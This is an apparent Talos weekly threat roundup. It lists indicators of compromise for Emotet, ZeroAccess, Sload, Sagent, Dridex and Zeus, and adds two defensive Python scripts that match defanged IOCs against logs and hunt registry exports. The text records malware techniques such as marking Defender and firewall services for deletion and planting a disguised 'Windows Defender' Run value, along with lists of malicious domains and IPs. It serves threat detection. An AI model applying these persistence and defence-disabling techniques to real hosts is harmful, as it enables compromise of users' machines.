Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 18 and Sept. 25. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and by discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting: spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Doc.Malware.Emotet-9762291-0 | Malware | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.ZeroAccess-9762336-0 | Trojan | ZeroAccess is a trojan that infects Windows systems, installing a rootkit to hide its presence on the affected machine, and serves as a platform for conducting click-fraud campaigns.
Doc.Malware.Sload-9762314-0 | Malware | The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell script may download the final payload or another downloader.
Doc.Malware.Sagent-9762330-0 | Malware | Sagent downloads and executes a binary using PowerShell launched from a Microsoft Word document.
Win.Packed.Dridex-9762380-0 | Packed | Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Packed.Zeus-9762533-1 | Packed | Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Trojan.Bifrost-9762706-0 | Trojan | Bifrost is a backdoor with more than 10 variants. Bifrost uses the typical server, server builder, and client backdoor program configuration, with the remote attacker using the client to execute arbitrary code on the compromised machine. Bifrost contains standard RAT features including a file manager, screen capture utility, keylogging, video recording, microphone and camera monitoring, and a process manager. Bifrost uses a mutex that may be named "Bif1234," or "Tr0gBot" to mark its presence on the

Threat Breakdown

Doc.Malware.Emotet-9762291-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 54 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Type) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Start) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ErrorControl) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ImagePath) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: DisplayName) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: WOW64) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: ObjectName) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> (Value Name: Description) 22
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: Type) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: Start) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: ErrorControl) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: DisplayName) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: WOW64) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: ObjectName) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: Type) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: Start) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: ErrorControl) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: DisplayName) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: WOW64) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TIMEOUT (Value Name: ObjectName) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: ImagePath) 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\APPIDPOLICYENGINEAPI (Value Name: Description) 2
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
74[.]219[.]172[.]26 54
34[.]192[.]19[.]33 54
209[.]105[.]242[.]72 14
134[.]209[.]36[.]254 7
120[.]138[.]30[.]150 2
104[.]156[.]59[.]7 2
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
geevida[.]com 54
elrofanfoods[.]com 14
e13678[.]dspb[.]akamaiedge[.]net 2
api[.]w[.]org 1
gmpg[.]org 1
www[.]yelp[.]com 1
Files and/or directories created | Occurrences
%HOMEPATH%\FsZ5e2W 54
%HOMEPATH%\FsZ5e2W\ZVF7izO 54
%HOMEPATH%\Fsz5e2w\Zvf7izo\Waqihok7.exe 54
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 15
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp 5
%System32%\KBDUGHR\PCPKsp.exe (copy) 1
%System32%\KBDMLT48\OobeFldr.exe (copy) 1
%System32%\certmgr\microsoft-windows-processor-aggregator-events.exe (copy) 1
%System32%\logagent\PlayToReceiver.exe (copy) 1
%System32%\pots\sdchange.exe (copy) 1
%System32%\SettingsHandlers_Geolocation\Windows.AccountsControl.exe (copy) 1
%System32%\TabSvc\SurfaceHubHandlers.exe (copy) 1
%System32%\KBDUSR\pcsvDevice.exe (copy) 1
%System32%\syncui\dot3mm.exe (copy) 1
%System32%\RpcRtRemote\shellstyle.exe (copy) 1
%System32%\PersonaX\sas.exe (copy) 1
%System32%\sbeio\DevicePairingProxy.exe (copy) 1
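
The IP and domain lists above (and in every section of this roundup) are defanged with "[.]" and occasionally carry a CIDR suffix, so they need a small amount of normalization before they can be matched against proxy or DNS logs. The block below is an added example written for this page, not code from Talos or from the accompanying JSON; IP_IOCS and DOMAIN_IOCS are copied from the Emotet lists above (plus the "67[.]199[.]248[.]10/31" entry from the Sload section, to show that a range is handled as a range), and SAMPLE_LOG and its "timestamp src -> dst" line format are constructed for the demo.

```python
"""Match the defanged network IOCs from this roundup against connection logs.

Added example, not code from the Talos post. IP_IOCS and DOMAIN_IOCS are
copied from the lists above; SAMPLE_LOG and its format are constructed.
"""
import ipaddress
import re

IP_IOCS = [
    "74[.]219[.]172[.]26", "34[.]192[.]19[.]33", "209[.]105[.]242[.]72",
    "134[.]209[.]36[.]254", "67[.]199[.]248[.]10/31",
]
DOMAIN_IOCS = ["geevida[.]com", "elrofanfoods[.]com", "e13678[.]dspb[.]akamaiedge[.]net"]


def refang(ioc):
    """Undo the '[.]' defanging the post uses so the value is machine-usable."""
    return ioc.replace("[.]", ".").strip()


def build_ip_networks(iocs):
    """Every IP IOC becomes an ip_network; a bare address is its own /32 (or /128)."""
    return [ipaddress.ip_network(refang(i), strict=False) for i in iocs]


def build_domain_set(iocs):
    return {refang(d).lower().rstrip(".") for d in iocs}


def matched_domain(host, domain_set):
    """Return the listed domain that host equals or is a subdomain of, else None.
    Matching is label-aligned, so 'notgeevida.com' does not match 'geevida.com'."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in domain_set:
            return candidate
    return None


# Constructed log format: "<timestamp> <src_ip> -> <dst_ip_or_hostname>".
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+->\s+(\S+)$")


def scan_log(lines, ip_iocs=IP_IOCS, domain_iocs=DOMAIN_IOCS):
    """Return (timestamp, src, dst, matched_ioc) for every line that touches a listed IOC."""
    nets = build_ip_networks(ip_iocs)
    domains = build_domain_set(domain_iocs)
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, src, dst = m.groups()
        try:
            addr = ipaddress.ip_address(dst)
        except ValueError:
            addr = None  # not an IP literal: treat the destination as a hostname
        if addr is not None:
            net = next((n for n in nets if addr in n), None)
            if net is not None:
                hits.append((ts, src, dst, str(net)))
        else:
            d = matched_domain(dst, domains)
            if d is not None:
                hits.append((ts, src, dst, d))
    return hits


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2020-09-21T10:02:11Z 10.0.0.15 -> 74.219.172.26",
    "2020-09-21T10:02:12Z 10.0.0.15 -> geevida.com",
    "2020-09-21T10:02:13Z 10.0.0.15 -> www.geevida.com",
    "2020-09-21T10:03:01Z 10.0.0.22 -> 67.199.248.11",    # inside the /31
    "2020-09-21T10:03:02Z 10.0.0.22 -> 67.199.248.12",    # outside the /31
    "2020-09-21T10:03:03Z 10.0.0.22 -> www.example.org",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The lists are headed "does not indicate maliciousness" for a reason: entries such as the Akamai edge hostname or api.w.org are shared infrastructure that clean hosts also contact, so a hit is a lead to corroborate against the host artifacts (the created service keys and dropped files above), not a verdict. The occurrence counts are a useful first filter; an IOC seen in 54 of 54 samples is a far stronger pivot than one seen once.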

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, Malware, MITRE ATT&CK

Win.Trojan.ZeroAccess-9762336-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 67 samples
Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: DeleteFlag) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: DeleteFlag) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: DeleteFlag) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: DeleteFlag) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BROWSER (Value Name: Start) 66
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: Windows Defender) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND (Value Name: ErrorControl) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS (Value Name: ErrorControl) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: ErrorControl) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IPHLPSVC (Value Name: DeleteFlag) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC (Value Name: ErrorControl) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC (Value Name: ErrorControl) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE (Value Name: Type) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE (Value Name: Start) 66
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\BFE (Value Name: ErrorControl) 66
Mutexes | Occurrences
Global\e885f9a1-f894-11ea-887e-00501e3ae7b6 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
213[.]253[.]253[.]254 50
212[.]253[.]253[.]254 50
190[.]253[.]253[.]254 50
201[.]253[.]253[.]254 50
88[.]254[.]253[.]254 49
71[.]254[.]253[.]254 49
87[.]254[.]253[.]254 49
180[.]254[.]253[.]254 49
135[.]254[.]253[.]254 49
115[.]254[.]253[.]254 49
190[.]254[.]253[.]254 49
206[.]254[.]253[.]254 47
222[.]254[.]253[.]254 47
130[.]185[.]108[.]132 35
83[.]133[.]123[.]20 35
24[.]202[.]111[.]53 16
173[.]216[.]235[.]76 15
64[.]146[.]190[.]201 15
66[.]188[.]233[.]100 15
188[.]113[.]127[.]144 14
208[.]99[.]130[.]31 14
207[.]219[.]39[.]43 14
49[.]135[.]45[.]143 14
62[.]241[.]101[.]233 14
174[.]45[.]44[.]224 14

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
j[.]maxmind[.]com 66
Files and/or directories created | Occurrences
%System32%\LogFiles\Scm\e22a8667-f75b-4ba9-ba46-067ed4429de8 66
%SystemRoot%\assembly\GAC_32\Desktop.ini 58
%SystemRoot%\assembly\GAC_64\Desktop.ini 58
\$Recycle.Bin\S-1-5-18 58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f 58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\@ 58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\L 58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\U 58
\$Recycle.Bin\S-1-5-18\$0f210b532df043a6b654d5b43088f74f\n 58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f 58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\@ 58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\L 58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\U 58
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\$0f210b532df043a6b654d5b43088f74f\n 58
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\@ 46
\$Recycle.Bin\S-1-5-21-1160359183-2529320614-3255788068-500\$bc873181c718236380cd637b8be3cfa0\n 46
\systemroot\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f} 8
\systemroot\system32\services.exe 8
%System32%\services.exe 8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\@ 8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\L 8
%SystemRoot%\Installer\{0f210b53-2df0-43a6-b654-d5b43088f74f}\U 8
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\@ 1
\RECYCLER\S-1-5-18\$ad714f5b8798518b3ccb73fd900fd2ba\n 1
\RECYCLER\S-1-5-21-1258710499-2222286471-4214075941-500\$ad714f5b8798518b3ccb73fd900fd2ba\@ 1

*See JSON for more IOCs
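
Two of the registry indicator sets in this roundup describe host state a hunter can query directly: Emotet installs a service whose name is eight random alphanumerics (the '[A-Z0-9]{8}' pattern listed in the Emotet section), and ZeroAccess sets DeleteFlag on, or changes the Start value of, the Security Center, Windows Defender, Windows Firewall, IP Helper, Base Filtering Engine and Browser services while planting a Run value named "Windows Defender". The block below is an added example for this page, not code from Talos; it reads a .reg export of the Services and Run keys. The export text, the service name K7QW2ZP9, the "known 8-character services" baseline and the assumption that a genuine Windows Defender autorun lives under a "...\Windows Defender\" directory are all constructed for the demo, and ImagePath is written as a plain string rather than the hex(2) form a real export uses, to keep the sample readable.

```python
"""Hunt a .reg export for the Emotet and ZeroAccess service artifacts listed above.

Added example, not code from the Talos post. SAMPLE_EXPORT is constructed;
a real export stores ImagePath as hex(2) (REG_EXPAND_SZ), which this minimal
parser skips, so export with plain strings or extend parse_reg_export.
"""
import re

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')
SERVICE_KEY_RE = re.compile(
    r"^hkey_local_machine\\system\\(?:currentcontrolset|controlset\d{3})\\services\\[^\\]+$")
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
RANDOM_NAME_RE = re.compile(r"^[a-z0-9]{8}$", re.I)  # the post's '[A-Z0-9]{8}' service name
SERVICE_DISABLED = 4                                 # SCM "Start" value 4 = disabled
# Services ZeroAccess marks for deletion (DeleteFlag) in the IOCs above.
SECURITY_SERVICES = {"wscsvc", "windefend", "sharedaccess", "mpssvc", "iphlpsvc", "bfe", "browser"}
# Assumption: legitimate 8-character service names from a gold image; extend for your fleet.
KNOWN_8CHAR_SERVICES = {"netlogon", "schedule"}


def parse_reg_export(text):
    """Minimal .reg parser: {key: {value_name_lower: int | str}}; other value types are skipped."""
    reg, cur = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            cur = m.group(1)
            reg.setdefault(cur, {})
            continue
        m = VAL_RE.match(line)
        if m and cur is not None:
            name, dword, s = m.groups()
            # .reg escapes backslashes in strings as '\\'; collapse them back.
            reg[cur][name.lower()] = int(dword, 16) if dword is not None else s.replace("\\\\", "\\")
    return reg


def hunt(reg):
    """Return (rule, object, detail) findings for the three indicator classes."""
    findings = []
    for key, values in reg.items():
        lower = key.lower()
        if SERVICE_KEY_RE.match(lower):
            name = key.rsplit("\\", 1)[1]
            lname = name.lower()
            # Emotet: a service whose name is eight random alphanumerics.
            if RANDOM_NAME_RE.match(name) and lname not in KNOWN_8CHAR_SERVICES:
                findings.append(("emotet-random-service", name, values.get("imagepath")))
            # ZeroAccess: security services marked for deletion, or simply disabled.
            if lname in SECURITY_SERVICES:
                if "deleteflag" in values:
                    findings.append(("zeroaccess-service-marked-for-deletion", name, values["deleteflag"]))
                elif values.get("start") == SERVICE_DISABLED:
                    findings.append(("security-service-disabled", name, values["start"]))
        elif lower == RUN_KEY:
            # ZeroAccess plants a Run value named "Windows Defender". Assumption: the
            # genuine autorun (older Windows) points into a "...\Windows Defender\" directory.
            data = values.get("windows defender")
            if isinstance(data, str) and "\\windows defender\\" not in data.lower():
                findings.append(("zeroaccess-run-value", "Windows Defender", data))
    return findings


# Constructed export (not from a real host). Paths and names are made up.
SAMPLE_EXPORT = r'''
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Netlogon]
"Start"=dword:00000003
"ImagePath"="C:\\Windows\\system32\\lsass.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\K7QW2ZP9]
"Type"=dword:00000010
"Start"=dword:00000002
"ImagePath"="C:\\Windows\\SysWOW64\\qwzrtyui\\svc.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
"Start"=dword:00000004
"DeleteFlag"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BFE]
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"="C:\\Users\\victim\\AppData\\Local\\Temp\\svchost.exe"
'''

if __name__ == "__main__":
    for finding in hunt(parse_reg_export(SAMPLE_EXPORT)):
        print(finding)
```

DeleteFlag is what the Service Control Manager writes when a service has been marked for deletion and will be removed at the next reboot, so its presence on wscsvc, WinDefend, MpsSvc, BFE and the others is not something benign software does; Start=4 (disabled) on the same set is weaker on its own but worth a look. The eight-character name rule will fire on legitimate services such as Netlogon, which is why the baseline allowlist matters; report the ImagePath alongside the name so the analyst can triage, since the Emotet samples above drop into a random %SystemRoot%\SysWOW64\<8 lowercase letters> directory.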

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Doc.Malware.Sload-9762314-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 35 samples
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
217[.]144[.]104[.]39 35
103[.]214[.]167[.]114 35
51[.]254[.]205[.]84 35
2[.]59[.]117[.]6 35
139[.]162[.]210[.]105 35
103[.]130[.]219[.]49 35
67[.]199[.]248[.]10/31 31
51[.]77[.]231[.]185 2
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
www[.]litespeedtech[.]com 35
api[.]w[.]org 35
gmpg[.]org 35
t[.]me 35
www[.]xinwenlook[.]com 35
kpisolutions[.]net 35
fgyapim[.]com 35
atomic-soft[.]com 35
auto-boot-like[.]com 35
salamatbanoo[.]ir 35
bit[.]ly 31
aragrp[.]com 24
schema[.]org 6
e13678[.]dspb[.]akamaiedge[.]net 6
mysterythemes[.]com 6
demo[.]mysterythemes[.]com 6
www[.]aparat[.]com 4
data-vocabulary[.]org 1
image[.]rakuten[.]co[.]jp 1
www[.]shonanbbq[.]jp 1
thumbnail[.]image[.]rakuten[.]co[.]jp 1
shop[.]r10s[.]jp 1
www[.]rtl-theme[.]com 1
Files and/or directories created | Occurrences
\Kiloperit\Loterios.exe 35
\Kiloperit 35
\Kiloperit\Groters.cmd 35
%ProgramData%\Helpot.vbs 35
%ProgramData%\Kolester.vbs 35

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Doc.Malware.Sagent-9762330-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\CRYPTOGRAPHY\AUTOENROLLMENT 18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119110000000000000000F01FEC (Value Name: VBAFiles) 3
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
13[.]32[.]202[.]80 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
fantasticvilla[.]xyz 18
e13678[.]dspb[.]akamaiedge[.]net 9
Files and/or directories created | Occurrences
%HOMEPATH%\N5uIJVSp.dll 18
%APPDATA%\PC 18
%HOMEPATH%\N5uIJVSp.doc (copy) 18
%HOMEPATH%\N5uIJVSp.xls (copy) 18

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, Malware, MITRE ATT&CK

Win.Packed.Dridex-9762380-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE (Value Name: trkcore) 23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM (Value Name: DisableTaskMgr) 23
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 (Value Name: CheckSetting) 23
Mutexes | Occurrences
4oj60dJ9Xs 2
DUxkg1Zly8 2
FsmwiIaXQJ 2
RgbpTIRzqH 2
S20rHVn78p 2
YK0jORqGpm 2
oQlriA2SC2 2
pYAqiKTy6G 2
ysjNUhI3fQ 1
OxxTJgAuGK 1
ZSiWxuslLF 1
3HZo5rwPDk 1
oxdyH9R916 1
U0nOF345iD 1
OQuDgnKjgb 1
Dg8OhX9ks5 1
ONdWouHBjG 1
qNKBbYN3Gk 1
KFJYC8aEJf 1
bZtEUuuwxr 1
eIR1MIHbxz 1
CFoRQitvit 1
Nq7tHYXINb 1
JgRLdW3NCE 1
qrgIwZpieG 1

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
172[.]217[.]10[.]110 23
104[.]23[.]99[.]190 14
104[.]23[.]98[.]190 13
72[.]21[.]81[.]240 7
74[.]125[.]192[.]102 7
74[.]125[.]192[.]100/31 7
205[.]185[.]216[.]10 6
74[.]125[.]192[.]113 6
74[.]125[.]192[.]139 3
205[.]185[.]216[.]42 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
pastebin[.]com 23
ctldl[.]windowsupdate[.]com 14
cs11[.]wpc[.]v0cdn[.]net 7
cds[.]d2s7q6s2[.]hwcdn[.]net 7
www[.]cirrqqch1d[.]com 2
www[.]dwrutkyurj[.]com 2
www[.]eaoptse6xd[.]com 2
www[.]pddcairfkr[.]com 2
www[.]s570ijnkte[.]com 2
www[.]tbetwbt4lv[.]com 2
www[.]u2mhtlzsgn[.]com 2
www[.]y8bj6axylz[.]com 2
www[.]twrarbf1so[.]com 1
www[.]imxtrspuzg[.]com 1
www[.]ayyi7w08li[.]com 1
www[.]psmjdphj9d[.]com 1
www[.]twpm4fspo9[.]com 1
www[.]hmxcfbeqby[.]com 1
www[.]pgdigwtozq[.]com 1
www[.]waou2qqwkx[.]com 1
www[.]86lxhrlqmy[.]com 1
www[.]02n7kj0t9a[.]com 1
www[.]44cyorvjwu[.]com 1
www[.]ezrqi0knvw[.]com 1
www[.]6ephtujqmi[.]com 1

*See JSON for more IOCs

Files and/or directories created | Occurrences
<malware cwd>\old_<malware exe name> (copy) 23
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 2
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 2

File Hashes
*See JSON for more IOCs

Coverage

Product | Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Win.Packed.Zeus-9762533-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: {2EC645E8-BA31-AD44-55BA-04D54CAC27C8}) 11
<HKCU>\Software\Microsoft\<random, matching '[A-Z][a-z]{3,11}'> 11
<HKCU>\SOFTWARE\MICROSOFT\AZOJ (Value Name: 257f4325) 1
<HKCU>\SOFTWARE\MICROSOFT\AZOJ (Value Name: 321172f) 1
<HKCU>\SOFTWARE\MICROSOFT\AGHE (Value Name: 10g3jc8j) 1
<HKCU>\SOFTWARE\MICROSOFT\AGHE (Value Name: 314c8b49) 1
<HKCU>\SOFTWARE\MICROSOFT\AZOJ (Value Name: 2a478bcj) 1
<HKCU>\SOFTWARE\MICROSOFT\AGHE (Value Name: 14c015a5) 1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC (Value Name: 32e7554e) 1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC (Value Name: j67a384) 1
<HKCU>\SOFTWARE\MICROSOFT\VYUCEC (Value Name: 36b9ba1c) 1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV (Value Name: 1i3ae11a) 1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV (Value Name: ea006f8) 1
<HKCU>\SOFTWARE\MICROSOFT\COPOUV (Value Name: 1e74d800) 1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD (Value Name: hijc2ga) 1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD (Value Name: 2j7e3bb4) 1
<HKCU>\SOFTWARE\MICROSOFT\AWOJAD (Value Name: 12f2286c) 1
<HKCU>\SOFTWARE\MICROSOFT\BYCUO (Value Name: 21hc4b0g) 1
<HKCU>\SOFTWARE\MICROSOFT\BYCUO (Value Name: ejhh122) 1
